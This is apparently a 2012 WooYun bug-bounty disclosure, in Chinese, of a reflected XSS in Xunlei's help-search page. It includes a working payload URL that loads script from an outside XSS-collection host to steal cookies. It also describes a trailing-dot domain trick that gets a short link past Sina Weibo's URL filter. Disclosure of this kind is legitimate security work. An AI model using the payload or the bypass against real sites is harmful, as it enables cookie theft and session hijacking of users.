漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-016270
漏洞标题:迅雷在线客服系统反射型XSS成功盗取cookie+新浪微博网址检查bypass
相关厂商:迅雷
漏洞作者: Allmylife
提交时间:2012-12-20 14:16
修复时间:2013-02-03 14:16
公开时间:2013-02-03 14:16
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-12-20: 细节已通知厂商并且等待厂商处理中
2012-12-20: 厂商已经确认,细节仅向厂商公开
2012-12-30: 细节向核心白帽子及相关领域专家公开
2013-01-09: 细节向普通白帽子公开
2013-01-19: 细节向实习白帽子公开
2013-02-03: 细节向公众公开
简要描述:
提交了一个反射型的跨站,只弹个框框,被乌云忽略了,好吧,还得盗取cookie啊。
详细说明:
帮助搜索的地方,过滤不严,可以输入跨站脚本
但是http://help.xunlei.com没找到可以直接给客服发消息的地方,只好转向迅雷官方微博
用
http://help.xunlei.com/searchResult.html?searchstr=%E2%80%9D%3Cscript%20src=%22http://xsscn.sinaapp.com/?u=8349dd%22%20%3E%20%3C/script%3E%3C!--
这个链接用126.am转一下
http:/126.am/Zj84p4
呵呵,这里面有个小技巧,我想了一会才想到,因为新浪微博不让直接提交126.am的短网址。
我是这样想的,应该是新浪用规则提取出了,域名判断,怎么办呢,哈哈
好吧,我们在域名后面加个点吧。
http://126.am./Zj84p4
哈哈.成功了。
我想这个方法应该可以绕过新浪微博所有的域名的检查,唉,应该比这个xss有价值吧。
漏洞证明:
修复方案:
迅雷,修复xss吧
新浪,修复这个bypass吧。
迅雷会员快到期了,求白金会员卡。哈哈
版权声明:转载请注明来源 Allmylife@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2012-12-20 17:36
厂商回复:
感谢反馈!
最新状态:
暂无